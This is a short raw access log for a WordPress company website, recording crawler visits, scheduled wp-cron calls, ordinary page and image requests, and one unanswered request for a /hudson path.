66.249.68.71 - - [24/Oct/2025:07:39:25 +0800] "GET /services HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.68.70 - - [24/Oct/2025:07:39:30 +0800] "GET /services/ HTTP/1.1" 200 19769 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
36.133.115.36 - - [24/Oct/2025:07:56:41 +0800] "POST /wp-cron.php?doing_wp_cron=1761263801.5480210781097412109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [24/Oct/2025:07:56:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [24/Oct/2025:07:58:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761263937.0389399528503417968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [24/Oct/2025:07:58:57 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [24/Oct/2025:08:21:53 +0800] "POST /wp-cron.php?doing_wp_cron=1761265313.5412070751190185546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.7.209.88 - - [24/Oct/2025:08:21:53 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF HTTP/1.1" 301 5 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
120.7.209.88 - - [24/Oct/2025:08:21:54 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22064 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
36.133.115.36 - - [24/Oct/2025:08:39:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761266391.4564940929412841796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.49.231.7 - - [24/Oct/2025:08:39:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
49.49.231.7 - - [24/Oct/2025:08:39:52 +0800] "GET / HTTP/1.1" 200 33932 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
51.158.54.10 - - [24/Oct/2025:08:39:57 +0800] "GET /robots.txt HTTP/1.0" 200 378 "-" "xfa1"
36.133.115.36 - - [24/Oct/2025:09:20:49 +0800] "POST /wp-cron.php?doing_wp_cron=1761268849.7167689800262451171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
114.96.103.33 - - [24/Oct/2025:09:20:50 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [24/Oct/2025:10:16:06 +0800] "POST /wp-cron.php?doing_wp_cron=1761272166.2124869823455810546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [24/Oct/2025:10:16:07 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [24/Oct/2025:10:40:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761273608.3442759513854980468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [24/Oct/2025:10:40:08 +0800] "HEAD /hudson HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
222.223.246.185 - - [24/Oct/2025:10:41:05 +0800] "GET /about/ HTTP/1.1" 200 30091 "https://cn.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67"
222.223.246.185 - - [24/Oct/2025:10:41:12 +0800] "GET /wp-content/uploads/2025/07/1750649803-qizhou800x500_2.webp HTTP/1.1" 200 63616 "http://cqqizhou.com/about/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67"
